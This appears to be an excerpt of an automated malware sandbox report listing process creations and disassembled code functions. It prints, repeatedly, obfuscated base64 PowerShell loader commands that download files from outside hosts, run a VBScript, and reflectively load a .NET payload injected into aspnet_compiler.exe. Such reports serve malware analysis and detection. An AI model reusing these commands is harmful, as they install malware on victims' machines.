                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"Jump to behavior
                  Suspicious command line found
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"Jump to behavior
                  Suspicious powershell command line found
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfoseJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.cmdline"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.cmdline"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00C9B73D push 8BD08B56h; iretd 3_2_00C9B743
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04C329C0 push cs; retf 0007h7_2_04C329C2
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04C329A0 push cs; retf 0007h7_2_04C329A2
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04C32A30 pushfd ; ret 7_2_04C32A3A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00407041 push cs; iretd 12_2_00407042
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0041705E push edi; iretd 12_2_00417060
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_004030F0 push eax; ret 12_2_004030F2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0041C8FC push cs; iretd 12_2_0041C8C9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00401949 push 63DCA26Ah; ret 12_2_0040194E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0040214B push edx; retf 12_2_0040214E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00402101 push ebp; iretd 12_2_0040210D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0040210E push eax; retf 12_2_0040214A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_004021A4 push eax; retf 12_2_0040214A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0041125B pushfd ; ret 12_2_0041125E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_004242D9 push esp; ret 12_2_00424330
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_004242E3 push esp; ret 12_2_00424330
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00401AB8 push edx; retf 12_2_00401AE3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00413416 push ecx; iretd 12_2_00413417
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0041ECDC push ds; iretd 12_2_0041ECDD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00401DF5 push ebp; iretd 12_2_00401DB2
